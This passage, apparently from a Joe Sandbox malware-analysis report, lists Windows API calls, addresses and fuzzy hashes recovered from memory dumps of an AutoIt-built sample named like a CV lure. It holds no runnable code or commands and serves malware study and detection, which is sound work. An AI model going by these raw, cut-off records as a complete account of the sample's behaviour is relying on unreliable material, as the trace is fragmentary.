                                                                                            • GetStockObject.GDI32(00000011), ref: 000DD1CE
                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 000DD1D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3970641297-0
                                                                                            • Opcode ID: adeabbe1cadf990b2f0e4edb9225932b7a9bb488e6ab0302fc2647d29a481156
                                                                                            • Instruction ID: 1c4c2528afa711444af205272bff346a83ac5c164c279606056a763b1fe39f2c
                                                                                            • Opcode Fuzzy Hash: adeabbe1cadf990b2f0e4edb9225932b7a9bb488e6ab0302fc2647d29a481156
                                                                                            • Instruction Fuzzy Hash: 8E11ADB6101609BFEF124FA09C50EEABBA9FF09364F040103FA1452260D7319DA09BA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                            • Instruction ID: f9986cf4312e69b49a725566b0cd29dd9d3120931cfc5036e7c7c9ccc1f635c7
                                                                                            • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                            • Instruction Fuzzy Hash: 4A01493604014EBBCF625E88DC118EE3F67BB18355B588455FF2899831D336DAB2BB81
                                                                                            APIs
                                                                                              • Part of subcall function 000E7A0D: __getptd_noexit.LIBCMT ref: 000E7A0E
                                                                                            • __lock.LIBCMT ref: 000E748F
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 000E74AC
                                                                                            • _free.LIBCMT ref: 000E74BF
                                                                                            • InterlockedIncrement.KERNEL32(01935F60), ref: 000E74D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                            • String ID:
                                                                                            • API String ID: 2704283638-0
                                                                                            • Opcode ID: f0ba755ecc8c8ea8f4a28a4fa18858309f5faede5d23c851227330eaf4134d4d
                                                                                            • Instruction ID: 9213070f7da5d0b25a7a695cee45eac2bf02e5c4c870e52bdb858eb168f3cb82
                                                                                            • Opcode Fuzzy Hash: f0ba755ecc8c8ea8f4a28a4fa18858309f5faede5d23c851227330eaf4134d4d
                                                                                            • Instruction Fuzzy Hash: 8501C4719066519FD766AF66A40579DBBB0BF44710F144009F41C77AD1CB305981DFD2
                                                                                            APIs
                                                                                            • __lock.LIBCMT ref: 000E7AD8
                                                                                              • Part of subcall function 000E7CF4: __mtinitlocknum.LIBCMT ref: 000E7D06
                                                                                              • Part of subcall function 000E7CF4: EnterCriticalSection.KERNEL32(00000000,?,000E7ADD,0000000D), ref: 000E7D1F
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 000E7AE5
                                                                                            • __lock.LIBCMT ref: 000E7AF9
                                                                                            • ___addlocaleref.LIBCMT ref: 000E7B17
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                            • String ID:
                                                                                            • API String ID: 1687444384-0
                                                                                            • Opcode ID: e6f684f40e881dd12dcd305323011cedc6ff8988539b229fd16bc59f26ad3776
                                                                                            • Instruction ID: 0737913e02750772498fa092eb3d91890463521a7701be3534fd8c763be8e2e0
                                                                                            • Opcode Fuzzy Hash: e6f684f40e881dd12dcd305323011cedc6ff8988539b229fd16bc59f26ad3776
                                                                                            • Instruction Fuzzy Hash: DB016D71504B40EFD730DF76D90578AB7F0AF50321F20890EE49AA76A2CBB0A680CB01
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 0012E33D
                                                                                            • _memset.LIBCMT ref: 0012E34C
                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00183D00,00183D44), ref: 0012E37B
                                                                                            • CloseHandle.KERNEL32 ref: 0012E38D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3277943733-0
                                                                                            • Opcode ID: 6398448b6dfa5cd601ff68027b5b7a0249d7b2fdbe70377ba5f4a61d4a480929
                                                                                            • Instruction ID: 02c86797a41ac7489cd2aba3cc2ca255853addea66c7d0616584dd4c90b93be8
                                                                                            • Opcode Fuzzy Hash: 6398448b6dfa5cd601ff68027b5b7a0249d7b2fdbe70377ba5f4a61d4a480929
                                                                                            • Instruction Fuzzy Hash: 2BF0BEF0100304BEE2002BE1AC45FB77E5CEB04F50F444120FE08E65A2D3B19F8087A8
                                                                                            APIs
                                                                                              • Part of subcall function 000DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 000DAFE3
                                                                                              • Part of subcall function 000DAF83: SelectObject.GDI32(?,00000000), ref: 000DAFF2
                                                                                              • Part of subcall function 000DAF83: BeginPath.GDI32(?), ref: 000DB009
                                                                                              • Part of subcall function 000DAF83: SelectObject.GDI32(?,00000000), ref: 000DB033
                                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0012EA8E
                                                                                            • LineTo.GDI32(00000000,?,?), ref: 0012EA9B
                                                                                            • EndPath.GDI32(00000000), ref: 0012EAAB
                                                                                            • StrokePath.GDI32(00000000), ref: 0012EAB9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                            • String ID:
                                                                                            • API String ID: 1539411459-0
                                                                                            • Opcode ID: 014b23ccd0409170030de629a5224798a4e2eaf8d1f1965343c3d4e5ea3e129a
                                                                                            • Instruction ID: 85e5148813c2bbad29d2034016960570a715000ceecf0a0156d04e06153dc44e
                                                                                            • Opcode Fuzzy Hash: 014b23ccd0409170030de629a5224798a4e2eaf8d1f1965343c3d4e5ea3e129a
                                                                                            • Instruction Fuzzy Hash: D4F05E36005269BBDF129FA4BC0AFCE3F59AF16311F144201FA11625F187B856A2CBA5
                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000FC84A
                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 000FC85D
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 000FC864
                                                                                            • AttachThreadInput.USER32(00000000), ref: 000FC86B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2710830443-0
                                                                                            • Opcode ID: 3b993df9414b8d93a2bb62c24edc4e121f4baae096eb500ce9569d288afa1687
                                                                                            • Instruction ID: c3a731a5a848dd0a4c3ac6ef13a81f0e1a420f5d8b4b80fc11581fb301353427
                                                                                            • Opcode Fuzzy Hash: 3b993df9414b8d93a2bb62c24edc4e121f4baae096eb500ce9569d288afa1687
                                                                                            • Instruction Fuzzy Hash: 1BE0307514122C76EF201B61AC0DEDB7F5CEF067A1F418421B60D84860CA718581D7E0
                                                                                            APIs
                                                                                            • GetCurrentThread.KERNEL32 ref: 000FB0D6
                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,000FAC9D), ref: 000FB0DD
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000FAC9D), ref: 000FB0EA
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,000FAC9D), ref: 000FB0F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                            • String ID:
                                                                                            • API String ID: 3974789173-0
                                                                                            • Opcode ID: a8ef4a24c4eb46185591f2a5308574951f10ac7a448b2a829fba2a17c9ff0471
                                                                                            • Instruction ID: daee56eed4e083dddd8233ee528143ef283f8a9cba091da78430bb7d71f81d3c
                                                                                            • Opcode Fuzzy Hash: a8ef4a24c4eb46185591f2a5308574951f10ac7a448b2a829fba2a17c9ff0471
                                                                                            • Instruction Fuzzy Hash: 75E0867A7012119BDB601FB1AC0CB573BE8EF56795F018828F741D7460DF348481CB60
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000008), ref: 000DB496
                                                                                            • SetTextColor.GDI32(?,000000FF), ref: 000DB4A0
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 000DB4B5
                                                                                            • GetStockObject.GDI32(00000005), ref: 000DB4BD
                                                                                            • GetWindowDC.USER32(?,00000000), ref: 0013DE2B
                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0013DE38
                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0013DE51
                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0013DE6A
                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0013DE8A
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0013DE95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1946975507-0
                                                                                            • Opcode ID: 9eb0c35381729773bc6af7d1527b8719522a895b776d63b998b5c789dde32a51
                                                                                            • Instruction ID: c89c22f1139ba4c0529b2d89b075211d1a7a2b74a1b9d8a65306e81761f21769
                                                                                            • Opcode Fuzzy Hash: 9eb0c35381729773bc6af7d1527b8719522a895b776d63b998b5c789dde32a51
                                                                                            • Instruction Fuzzy Hash: 1BE0ED75100280AAEF215BB4BC09BD83F11AB56735F14C666FAAA580F2C7718581DB11
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2889604237-0
                                                                                            • Opcode ID: 85100fcf2ab5e0587907fff43f542fe2b2432b98f3ee656aed963a8a95da0cfe
                                                                                            • Instruction ID: d8fef20d30d4f09f7070fa32bda690a9b58e59578c046935d550e95c920e6104
                                                                                            • Opcode Fuzzy Hash: 85100fcf2ab5e0587907fff43f542fe2b2432b98f3ee656aed963a8a95da0cfe
                                                                                            • Instruction Fuzzy Hash: CCE012B9100204EFDF015FB0A848A6EBBA8EB4C350F12880AF95A8B621DB7498818B50
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000FB2DF
                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 000FB2EB
                                                                                            • CloseHandle.KERNEL32(?), ref: 000FB2F4
                                                                                            • CloseHandle.KERNEL32(?), ref: 000FB2FC
                                                                                              • Part of subcall function 000FAB24: GetProcessHeap.KERNEL32(00000000,?,000FA848), ref: 000FAB2B
                                                                                              • Part of subcall function 000FAB24: HeapFree.KERNEL32(00000000), ref: 000FAB32
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                            • String ID:
                                                                                            • API String ID: 146765662-0
                                                                                            • Opcode ID: 26c3608b54e1fc9c3d9802446dec975b7654c89a8f7403da8314106b8a2eb03d
                                                                                            • Instruction ID: 25d264843480c7b049f5a2a846f1b46476cfeaa23764eaae1e910012a745593f
                                                                                            • Opcode Fuzzy Hash: 26c3608b54e1fc9c3d9802446dec975b7654c89a8f7403da8314106b8a2eb03d
                                                                                            • Instruction Fuzzy Hash: 87E0BF7A104005BBCF022F95EC08859FBB6FF8A7213108221F61581975CB3294B1EB51
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2889604237-0
                                                                                            • Opcode ID: 9d76a69fd68d3a2837ba35fdd992e15bb1fe5cb522dfe73787fae9f416e6e09f
                                                                                            • Instruction ID: b0e26956657271544ae2f8ed0d602481e5aaf0ee65c6c6a9531ee9931de1306a
                                                                                            • Opcode Fuzzy Hash: 9d76a69fd68d3a2837ba35fdd992e15bb1fe5cb522dfe73787fae9f416e6e09f
                                                                                            • Instruction Fuzzy Hash: C0E046B9500300EFDF019F70E84866DBBA8EB4D350F12880AF95A8B721CB7998818F10
                                                                                            APIs
                                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 000FDEAA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContainedObject
                                                                                            • String ID: AutoIt3GUI$Container
                                                                                            • API String ID: 3565006973-3941886329
                                                                                            • Opcode ID: c0e8a55916e50ef7db372085f708fe99dce2fe3cd51f3c72df6fde7715fe9de9
                                                                                            • Instruction ID: c8d0927edb232004d7e369f778fb11cea95b41da9c49011b98d2a26ebd3e8615
                                                                                            • Opcode Fuzzy Hash: c0e8a55916e50ef7db372085f708fe99dce2fe3cd51f3c72df6fde7715fe9de9
                                                                                            • Instruction Fuzzy Hash: 02914670600605AFDB64DF64C884F6AB7FABF49710F20856EF94ACB691DB71E841CB60
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000), ref: 000DBCDA
                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 000DBCF3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                            • String ID: @
                                                                                            • API String ID: 2783356886-2766056989
                                                                                            • Opcode ID: e640714f8c21c2e996a49709af10cc73bd2d19370555c21d56671fd36780077c
                                                                                            • Instruction ID: 5bd7cbbd8f158bfd210ef46d451d9de4bfb899c31f964f9b0791285383a3f106
                                                                                            • Opcode Fuzzy Hash: e640714f8c21c2e996a49709af10cc73bd2d19370555c21d56671fd36780077c
                                                                                            • Instruction Fuzzy Hash: 665137714187449BE320AF14DC86BAFBBE8FFA8354F41484EF5C8411A6DB7089A98766
                                                                                            APIs
                                                                                              • Part of subcall function 000C44ED: __fread_nolock.LIBCMT ref: 000C450B
                                                                                            • _wcscmp.LIBCMT ref: 0010C65D
                                                                                            • _wcscmp.LIBCMT ref: 0010C670
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscmp$__fread_nolock
                                                                                            • String ID: FILE
                                                                                            • API String ID: 4029003684-3121273764
                                                                                            • Opcode ID: 98d86ff89bf11a425fba7d0e49fbc27154fedd28a012cad27f9f0e07bfee9bb0
                                                                                            • Instruction ID: bc408da5e61b789019d1fe9349a62d164183f713fc6125c579fd8ae19e402d26
                                                                                            • Opcode Fuzzy Hash: 98d86ff89bf11a425fba7d0e49fbc27154fedd28a012cad27f9f0e07bfee9bb0
                                                                                            • Instruction Fuzzy Hash: CC41C672A0021ABBDF209BA4DC91FEF77B9AF49714F004469F645FB182D7B19A04CB91
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0012A85A
                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0012A86F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: '
                                                                                            • API String ID: 3850602802-1997036262
                                                                                            • Opcode ID: d1560c19190e070828aa17c06a918c6bc4cf9791e840fe404ae740ebaaff2316
                                                                                            • Instruction ID: b96e4fa538030fda7c986d0d032262779640f8fa1ac40a42a3e4b019d8614173
                                                                                            • Opcode Fuzzy Hash: d1560c19190e070828aa17c06a918c6bc4cf9791e840fe404ae740ebaaff2316
                                                                                            • Instruction Fuzzy Hash: 22410775E01319AFDB14CFA8D880BDA7BB9FF08300F51006AE905AB381D771A952CFA5
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 00115190
                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 001151C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
